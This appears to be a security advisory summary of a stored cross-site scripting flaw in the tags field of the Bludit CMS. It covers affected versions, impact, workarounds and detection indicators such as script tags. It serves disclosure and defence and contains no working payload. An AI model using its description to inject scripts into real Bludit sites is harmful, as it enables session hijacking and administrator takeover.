Full Report
CERT Polska has received a report about a Stored Cross-site Scripting vulnerability found in Bludit software.
Analysis Summary
# Vulnerability: Stored Cross-Site Scripting in Bludit Page Tagging
## CVE Details
- **CVE ID:** CVE-2026-4420
- **CVSS Score:** Not explicitly provided in the article (Estimated 7.0 - 8.0 range due to privilege escalation potential)
- **CWE:** CWE-79 (Improper Neutralization of Input During Web Page Generation)
## Affected Systems
- **Products:** Bludit (CMS software)
- **Versions:** 3.17.2, 3.18.0 (Note: Other versions were not tested and may also be vulnerable)
- **Configurations:** Systems where users have "Author," "Editor," or "Administrator" privileges.
## Vulnerability Description
Bludit is vulnerable to Stored Cross-Site Scripting (XSS) within its page creation functionality. Specifically, the "tags" field of an article does not properly sanitize input. An authenticated attacker with at least page-creation privileges can inject a malicious JavaScript payload into this field. Because the resulting page is accessible to unauthenticated visitors, the payload executes in the context of any user (including administrators) who navigates to the URL of the affected resource.
## Exploitation
- **Status:** PoC availability implied (vulnerability confirmed via report)
- **Complexity:** Medium
- **Attack Vector:** Network (Authenticated)
## Impact
- **Confidentiality:** High (Potential for session hijacking and data theft)
- **Integrity:** High (Can be used to automatically create new site administrators or modify content)
- **Availability:** Low (Does not inherently crash the system, but can lead to account takeover)
## Remediation
### Patches
- At the time of publication, the vendor has not provided details regarding a specific patch or version fix. Users are advised to monitor the official Bludit repository for updates.
### Workarounds
- **Strict Access Control:** Limit "Author" and "Editor" roles only to highly trusted individuals.
- **Manual Input Sanitization:** Review new articles and tags for script tags or unusual characters (`<`, `>`, `"`, `'`).
- **Web Application Firewall (WAF):** Implement WAF rules to detect and block common XSS patterns in POST requests directed at the Bludit admin panel.
## Detection
- **Indicators of Compromise:** Presence of `<script>` tags or obfuscated JavaScript in the `tags` metadata of the CMS database or site articles.
- **Detection Methods:**
- Audit web server logs for suspicious activity in the page creation/editing modules.
- Use automated vulnerability scanners to test the tags field for script reflection.
## References
- **Vendor Advisory:** [None provided by vendor]
- **Relevant Links:**
- hxxps[://]cert[.]pl/en/posts/2026/04/CVE-2026-4420/
- hxxps[://]www[.]cve[.]org/CVERecord?id=CVE-2026-4420
- hxxps[://]cwe[.]mitre[.]org/data/definitions/79[.]html